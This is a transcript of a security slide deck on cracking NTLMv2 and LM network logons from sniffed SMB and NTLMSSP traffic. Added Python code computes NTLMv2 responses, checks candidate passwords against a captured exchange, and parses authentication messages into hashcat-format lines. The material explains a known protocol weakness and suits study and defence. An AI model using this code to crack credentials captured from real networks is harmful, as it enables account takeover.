
Cracking NTLMv2 Authentication

Cracking NTLMv2 Authentication. Urity@SecurityFriday.com. NTLM version 2, as described in the Microsoft Knowledge Base: “Microsoft has developed an enhancement, called NTLM version 2, that significantly improves both the authentication and session security mechanisms.”


Presentation Transcript


  1. Cracking NTLMv2 Authentication Urity@SecurityFriday.com

  2. NTLM version 2- in Microsoft Knowledge Base - “Microsoft has developed an enhancement, called NTLM version 2, that significantly improves both the authentication and session security mechanisms.” “For NTLMv2, the key space for password-derived keys is 128 bits. This makes a brute force search infeasible, even with hardware accelerators, if the password is strong enough.” Cracking NTLMv2 Authentication

  3. Windows authentications for network logons • LAN Manager (LM) challenge/response • Windows NT challenge/response (also known as NTLM version 1) • NTLM version 2 challenge/response • Kerberos

  4. Agenda • LM authentication mechanism • Demonstration (1) • NTLM v2 authentication algorithm • Sniffing SMB traffic on port 139 • Sniffing SMB traffic on port 445 • Demonstration (2)

  5. Agenda (section divider; same list as slide 4)

  6. Challenge/Response sequence • Client: request to connect • Server: respond with a challenge code • Client: send an encrypted password (the response computed from the password hash and the challenge) • Server: reply with the result of authentication

  7. LM challenge/response - 1 - (LM hash) • uppercase(password), zero-padded to 14 bytes, is split into two 7-byte DES keys • DES(key = uppercase(password[1..7]), magic word) = LM_hash[1..8] • DES(key = uppercase(password[8..14]), magic word) = LM_hash[9..16] • the 16-byte LM hash is then padded with 00 00 00 00 00 to 21 bytes (LM_hash[17..21]) • the magic word is “KGS!@#$%”

  8. LM challenge/response - 2 - (LM response, three DES operations on the 8-byte challenge code) • DES(key = LM_hash[1..7], challenge code) = LM_response[1..8] • DES(key = LM_hash[8..14], challenge code) = LM_response[9..16] • DES(key = LM_hash[15..21], i.e. LM_hash[15..16] + 00 00 00 00 00, challenge code) = LM_response[17..24]

  9. Password less than 8 characters • uppercase(password[8..14]) is 00 00 00 00 00 00 00, so DES(key = 00 00 00 00 00 00 00, magic word) gives the constant LM_hash[9..16] = AA D3 B4 35 B5 14 04 EE • the third key LM_hash[15..21] is therefore 04 EE 00 00 00 00 00, fully known: compute DES(04 EE 00 00 00 00 00, challenge code) and compare it with LM_response[17..24] to detect a short password from a single sniffed exchange • the second key LM_hash[8..14] = LM_hash[8] + AA D3 B4 35 B5 14 has only one unknown byte, so LM_response[9..16] is recovered with at most 256 DES operations

  10. BeatLM demonstration • check whether the password is less than 8 characters • 1000 authentication captures from our office

  11. Weakness of LM & NTLMv1 See: • Hacking Exposed Windows 2000 • Microsoft Knowledge Base: Q147706 • L0phtcrack documentation

  12. Agenda (section divider; same list as slide 4)

  13. NTLM 2 Authentication • NT hash = MD4(unicode(password)) • NTLMv2 hash = HMAC_MD5(key = NT hash, unicode(uppercase(account name) + domain_or_hostname)); only the account name is uppercased • NTLMv2 response = HMAC_MD5(key = NTLMv2 hash, server_challenge + client_challenge), transmitted together with the client_challenge

  14. NTLMv2 more info - algorithm & how to enable - • HMAC: RFC2104 • MD5: RFC1321 • MD4: RFC1320 • Microsoft Knowledge Base: Q239869
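The computation on slide 13 carried through in code. This is an added example written for this page, not code from the presentation or from its BeatLM tool: a pure-Python MD4 (hashlib's MD4 is missing on many OpenSSL 3 builds), the NTLMv2 hash and response, and the candidate-password check that a cracker runs against a sniffed exchange. The user, domain, server challenge, client nonce, blob layout and password list are constructed here and are not captured data.

```python
import hmac
import hashlib
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds of 16 steps over 64-byte blocks)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK32

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    bit_len = len(data) * 8
    data += b"\x80"                                   # padding: 1 bit, zeros, 64-bit LE length
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                           # round 1
            a = rotl((a + f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 2, X index 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                           # round 3
            a = rotl((a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(unicode(password)); unicode means UTF-16LE here."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash = HMAC_MD5(NT hash, unicode(uppercase(user) + domain)); domain case is kept."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(ntv2_hash: bytes, server_challenge: bytes, client_challenge: bytes) -> bytes:
    """HMAC_MD5(NTLMv2 hash, server_challenge + client_challenge) followed by the client_challenge.
    For the NT response client_challenge is the variable-length blob; for the LMv2 response it is
    the 8-byte client nonce (slide 46)."""
    proof = hmac.new(ntv2_hash, server_challenge + client_challenge, hashlib.md5).digest()
    return proof + client_challenge


def crack(user: str, domain: str, server_challenge: bytes, nt_response: bytes, candidates):
    """Offline check of sniffed data: the first 16 bytes of the NT response are the proof, the
    rest is the blob that was hashed, so every candidate can be verified without the server."""
    proof, blob = nt_response[:16], nt_response[16:]
    for pw in candidates:
        guess = ntlmv2_response(ntlmv2_hash(pw, user, domain), server_challenge, blob)[:16]
        if hmac.compare_digest(guess, proof):
            return pw
    return None


def make_blob(client_nonce: bytes, timestamp: int, target_info: bytes) -> bytes:
    """Constructed NTLMv2 blob: type 01 01, reserved, 64-bit timestamp, 8-byte nonce, reserved,
    target info (AV pairs), reserved. The HMAC covers it verbatim, whatever its contents."""
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp)
            + client_nonce + b"\x00" * 4 + target_info + b"\x00" * 4)


def demo():
    """Constructed exchange (assumed names, not captured traffic), then the crack."""
    user, domain, password = "alice", "CORP", "Summer2003"
    server_challenge = bytes.fromhex("0123456789abcdef")
    target_info = b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le") + b"\x00" * 4  # NbDomainName, EOL
    blob = make_blob(bytes.fromhex("aabbccddeeff0011"), 0x01C3A1B2C3D4E5F6, target_info)
    nt_response = ntlmv2_response(ntlmv2_hash(password, user, domain), server_challenge, blob)
    return crack(user, domain, server_challenge, nt_response, ["password", "Password1", "Summer2003", "Winter2003"])


if __name__ == "__main__":
    print(demo())
```

The check needs nothing but the sniffed values listed on the "Requisite information" slides: account name, domain or host name, server challenge, and the NT response (proof plus blob). The Knowledge Base's 128-bit key-space claim therefore only helps when the password itself resists a dictionary or brute-force search, which is exactly what the quoted sentence qualifies with "if the password is strong enough".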

  15. LM, NTLMv1, NTLMv2

  16. Agenda (section divider; same list as slide 4)

  17. Authentication sequence - NetBT (NetBIOS over TCP/IP, port 139) - SMB_COM_NEGOTIATE request -> SMB_COM_NEGOTIATE response -> SMB_COM_SESSION_SETUP_ANDX request -> SMB_COM_SESSION_SETUP_ANDX response

  18. Extra SMB commands - NetBT (NetBIOS over TCP/IP) - NT/2000 clients may insert other SMB commands between negotiation and session setup, so a sniffer must not assume the two exchanges are adjacent: SMB_COM_NEGOTIATE request -> SMB_COM_NEGOTIATE response -> (NT/2000) SMB_COM_XXX request -> SMB_COM_XXX response -> SMB_COM_SESSION_SETUP_ANDX request -> SMB_COM_SESSION_SETUP_ANDX response

  19. Authentication packet header: Ethernet | IP | TCP | NetBIOS session header carrying the SMB block size | SMB mark FF 53 4D 42 (0xFF, ‘S’, ‘M’, ‘B’) | SMB command | ... An SMB packet is located by scanning for the 4-byte mark after the TCP payload start.

  20. SMB general header structure (in wire order): SMB mark FF 53 4D 42 | SMB command | Error code | Flags | some further fields | WordCount | ParameterWords (variable length, WordCount words) | ByteCount | Buffer (variable length, ByteCount bytes)

  21. SMB_COM_NEGOTIATE request over NetBT • SMB command: 0x72 • WordCount: 0x00

  22. SMB_COM_NEGOTIATE response over NetBT • SMB command: 0x72 • Flags: server response bit on • WordCount: 0x11 • Buffer contains the server challenge code: 8 bytes

  23. Server challenge code: SMB mark FF 53 4D 42 | SMB command 72 | Flags 8X (response bit set) | ... | WordCount 11 | ... | ByteCount | Server challenge code (in the buffer)

  24. SMB_COM_SESSION_SETUP_ANDX request over NetBT • SMB command: 0x73 • WordCount: 0x0D • Buffer contains • Encrypted password: 16 bytes • Client challenge code: 8 bytes • Account name • Domain/Workgroup/Host name

  25. Encrypted password: SMB mark FF 53 4D 42 | SMB command 73 | WordCount 0D | ... Length (of the password field) | ... ByteCount | Encrypted password | Client challenge code | Account & Domain/Host name. If the client challenge code is 0x0000000000000000, the client is a Win 98/ME machine with the DS Client (see slide 32).

  26. 2nd encrypted password - 1 - • NT/2000 transmits two types of encrypted password (an LM-style and an NT-style response) in one request • the 2nd client challenge code has variable length

  27. 2nd encrypted password - 2 - FF 53 4D 42 | 73 | WordCount 0D | ... 2nd length | ... | 2nd encrypted password | 2nd client challenge code, account & domain/host name

  28. SMB_COM_SESSION_SETUP_ANDX response over NetBT • SMB command: 0x73 • Error code • WordCount: 0x03

  29. Error codes that still mean the password was correct (the logon was refused for another reason, so the sniffed response is a valid target): • 0xC000006F The user is not allowed to log on at this time. • 0xC0000070 The user is not allowed to log on from this workstation. • 0xC0000071 The password of this user has expired. • 0xC0000072 Account currently disabled. • 0xC0000193 This user account has expired. • 0xC0000224 The user’s password must be changed before logging on the first time.

  30. Requisite information • Account name • Domain/Workgroup/Host name • Server challenge code • Client challenge code • Encrypted password • The result of authentication

  31. SMB protocol - specifications - Please check out: • ftp.microsoft.com/developr/drg/cifs • DCE/RPC over SMB (ISBN 1-57870-150-3) • www.samba.org/cifs/docs/what-is-smb.html

  32. Win 98/ME file sharing - encrypted password - Two cases: plain 98/ME file sharing, and 98/ME with the DS Client. Sequence: SMB_COM_NEGOTIATE request -> SMB_COM_NEGOTIATE response -> SMB_COM_SESSION_SETUP_ANDX request -> SMB_COM_SESSION_SETUP_ANDX response. Plain 98/ME file sharing does not use NTLMv2.

  33. Agenda (section divider; same list as slide 4)

  34. Authentication sequence - MS-DS (Direct SMB Hosting Service, port 445) - Windows 2000 uses two SMB_COM_SESSION_SETUP_ANDX exchanges: SMB_COM_NEGOTIATE request -> SMB_COM_NEGOTIATE response -> 1st SMB_COM_SESSION_SETUP_ANDX request -> 1st SMB_COM_SESSION_SETUP_ANDX response -> 2nd SMB_COM_SESSION_SETUP_ANDX request -> 2nd SMB_COM_SESSION_SETUP_ANDX response

  35. Challenge/Response - MS-DS (Direct SMB Hosting Service) - • Client: request to authenticate with NTLMSSP • Server: respond with a challenge code in NTLMSSP • Client: send an encrypted password in NTLMSSP • Server: reply with the result of authentication

  36. 1st SMB_COM_SESSION_SETUP_ANDX request over MS-DS • WordCount: 0x0C • Buffer contains • SecurityBlob

  37. SMB_COM_SESSION_SETUP_ANDX - WordCount - • Type 3 (WordCount 0x03) has OS name, LM type, Domain name • Type 4 (0x04) has SecurityBlob, OS name, LM type, Domain name • Type 12 (0x0C) has SecurityBlob, OS name, LM type • Type 13 (0x0D) has Password, Account name, Domain name, OS name, LM type

  38. SMB_COM_SESSION_SETUP_ANDX command - Type 12 (0x0C): SMB mark FF 53 4D 42 | SMB command 73 | WordCount 0C | ... SecurityBlob length | ... ByteCount | SecurityBlob (variable length)

  39. NTLMSSP 1 in SecurityBlob (NTLMSSP type 1): NTLMSSP mark: 8-byte ASCII string | message type 1: 4-byte little-endian | flags: 4 bytes (the negotiate flags, undocumented at the time) | Domain/Workgroup name length: 2-byte little-endian × 2 (length and maximum length, if any) | Domain/Workgroup name offset: 4-byte little-endian (if any) | Host name length: 2-byte little-endian × 2 (if any) | Host name offset: 4-byte little-endian (if any) | Host name & Domain/Workgroup name. Example bytes: 4E 54 4C 4D 53 53 50 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

  40. 1st SMB_COM_SESSION_SETUP_ANDX response over MS-DS • WordCount: 0x04 • Buffer contains • SecurityBlob

  41. SMB_COM_SESSION_SETUP_ANDX command - Type 4 (0x04): SMB mark FF 53 4D 42 | SMB command 73 | Flags 8X | WordCount 04 | ... SecurityBlob length | ... | SecurityBlob (variable length)

  42. NTLMSSP 2 in SecurityBlob (NTLMSSP type 2): NTLMSSP mark: 8-byte ASCII string | message type 2: 4-byte little-endian | Host name length: 2-byte little-endian × 2 | Host name offset: 4-byte little-endian | flags: 4 bytes (negotiate flags) | Server challenge code: 8 bytes | 8-byte zero (reserved) | Host & Domain name (target info) length: 2-byte little-endian × 2 | Host & Domain name offset: 4-byte little-endian | Host name & Domain name. Example bytes: 4E 54 4C 4D 53 53 50 00 02 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 (the payload begins at offset 0x30)

  43. 2nd SMB_COM_SESSION_SETUP_ANDX request over MS-DS • WordCount: 0x0C • Buffer contains • SecurityBlob

  44. SMB_COM_SESSION_SETUP_ANDX command - Type 12 (0x0C): SMB mark FF 53 4D 42 | SMB command 73 | WordCount 0C | ... SecurityBlob length | ... ByteCount | SecurityBlob (variable length)

  45. NTLMSSP 3 in SecurityBlob (NTLMSSP type 3): NTLMSSP mark: 8-byte ASCII string | message type 3: 4-byte little-endian | LM response length & offset | NT response length & offset | Domain/Host name length & offset | Account name length & offset | Host name length & offset | Unknown data (the encrypted session key) length & offset | flags: 4 bytes (negotiate flags) | Domain/Host name, Account name, Host name, LM response, NT response & Unknown data. Each length & offset descriptor is 2-byte length, 2-byte maximum length, 4-byte offset, all little-endian. Example bytes: 4E 54 4C 4D 53 53 50 00 03 00 00 00 40 00 00 00 (the payload begins at offset 0x40)

  46. NTLMv2 LM/NT response • LM response is constructed with • 1st encrypted password (HMAC_MD5 over the server challenge and the client challenge): 16 bytes • 1st client challenge code: 8 bytes • NT response is constructed with • 2nd encrypted password (HMAC_MD5 over the server challenge and the blob): 16 bytes • 2nd client challenge code (the blob): variable length, so an NT response longer than 24 bytes identifies NTLMv2

  47. 2nd SMB_COM_SESSION_SETUP_ANDX response over MS-DS • Error code • WordCount: 0x04

  48. Requisite information • Account name • Domain/Workgroup/Host name • Server challenge code • Client challenge code • Encrypted password • The result of authentication
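A parser for the two NTLMSSP blobs laid out on slides 42 and 45 that extracts the requisite information of slide 48, applies the length rule of slide 46 and the error-code rule of slide 29. This is example code written for this page, not the presentation's sniffer. The fixed-field offsets are those the slides show (payload starting at 0x30 for type 2 and 0x40 for type 3); the security-buffer descriptors are read from the message, so later variants with extra Version or MIC fields parse the same way. The messages, names and response bytes are constructed for the demonstration (the response bytes are filler, not real HMACs), and the hashcat mode 5600 line format is an assumption about a tool the page does not mention.

```python
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001          # low bit of the negotiate flags selects UTF-16LE strings

# NTSTATUS values from slide 29 (plus STATUS_SUCCESS): the password was correct.
PASSWORD_CORRECT_STATUS = {0x00000000, 0xC000006F, 0xC0000070, 0xC0000071,
                           0xC0000072, 0xC0000193, 0xC0000224}


def _field(buf: bytes, off: int) -> bytes:
    """Security buffer descriptor: Len(2) MaxLen(2) Offset(4), little-endian."""
    length, _max_len, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def _check(msg: bytes, msg_type: int) -> None:
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != msg_type:
        raise ValueError("not an NTLMSSP type %d message" % msg_type)


def parse_challenge(msg: bytes) -> dict:
    """Type 2 (slide 42): target name, flags, 8-byte server challenge, target info."""
    _check(msg, 2)
    return {"target_name": _field(msg, 12).decode("utf-16-le"),
            "flags": struct.unpack_from("<I", msg, 20)[0],
            "server_challenge": msg[24:32],      # after the flags, before 8 reserved bytes
            "target_info": _field(msg, 40)}


def parse_authenticate(msg: bytes) -> dict:
    """Type 3 (slide 45): LM/NT responses, domain, user, workstation, session key."""
    _check(msg, 3)
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    return {"lm_response": _field(msg, 12), "nt_response": _field(msg, 20),
            "domain": _field(msg, 28).decode(enc), "user": _field(msg, 36).decode(enc),
            "workstation": _field(msg, 44).decode(enc), "session_key": _field(msg, 52),
            "flags": flags}


def classify(nt_response: bytes) -> str:
    """Slide 46: an NTLMv2 NT response is a 16-byte HMAC plus a variable blob, so longer than 24."""
    return "NTLMv2" if len(nt_response) > 24 else "NTLMv1"


def password_correct(status: int) -> bool:
    """Slide 29: a refused logon with one of these codes still validates the sniffed response."""
    return status in PASSWORD_CORRECT_STATUS


def hashcat_5600(user: str, domain: str, server_challenge: bytes, nt_response: bytes) -> str:
    """Assumed hashcat -m 5600 line: USER::DOMAIN:serverchallenge:ntproof:blob (hex)."""
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(),
                                 nt_response[:16].hex(), nt_response[16:].hex())


def build_challenge(target_name: str, server_challenge: bytes, flags=0x00008201, target_info=b"") -> bytes:
    """Constructed type 2 with its payload at offset 0x30, as in the slide 42 dump."""
    name = target_name.encode("utf-16-le")
    msg = SIGNATURE + struct.pack("<I", 2) + struct.pack("<HHI", len(name), len(name), 48)
    msg += struct.pack("<I", flags) + server_challenge + b"\x00" * 8
    msg += struct.pack("<HHI", len(target_info), len(target_info), 48 + len(name))
    return msg + name + target_info


def build_authenticate(lm: bytes, nt: bytes, domain: str, user: str, workstation: str,
                       flags=0x00008201) -> bytes:
    """Constructed type 3 with its payload at offset 0x40, as in the slide 45 dump."""
    parts = [lm, nt, domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]          # b"": no encrypted session key
    msg, payload, off = SIGNATURE + struct.pack("<I", 3), b"", 64
    for p in parts:
        msg += struct.pack("<HHI", len(p), len(p), off)
        off += len(p)
        payload += p
    return msg + struct.pack("<I", flags) + payload


def demo() -> dict:
    """Constructed exchange with filler HMAC bytes; shows what a sniffer would record."""
    server_challenge = bytes.fromhex("0123456789abcdef")
    client_nonce = bytes.fromhex("aabbccddeeff0011")
    target_info = b"\x02\x00\x08\x00" + "CORP".encode("utf-16-le") + b"\x00" * 4
    t2 = build_challenge("CORP", server_challenge, target_info=target_info)
    lm = bytes(range(16)) + client_nonce                  # LMv2: 16-byte HMAC + 8-byte nonce
    blob = b"\x01\x01\x00\x00" + b"\x00" * 4 + b"\x00" * 8 + client_nonce + b"\x00" * 4
    nt = bytes(range(16, 32)) + blob                      # NTLMv2: 16-byte HMAC + blob
    t3 = build_authenticate(lm, nt, "CORP", "alice", "WS01")
    ch, au = parse_challenge(t2), parse_authenticate(t3)
    return {"kind": classify(au["nt_response"]),
            "line": hashcat_5600(au["user"], au["domain"], ch["server_challenge"], au["nt_response"]),
            "client_nonce": au["lm_response"][16:],
            "usable": password_correct(0xC0000072)}        # "account currently disabled"


if __name__ == "__main__":
    print(demo())
```

The same type 1/2/3 blobs appear wherever NTLMSSP is carried (slide 49 lists IIS, DCOM and Terminal Server), so the parser is independent of the SMB framing; only the code that locates the SecurityBlob inside SMB_COM_SESSION_SETUP_ANDX is port-139/445 specific.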

  49. NTLMSSP structure also used in NTLM authentication of • IIS • DCOM • NT Terminal Server • 2000 Terminal Service • NNTP Service

  50. Agenda (section divider; same list as slide 4)
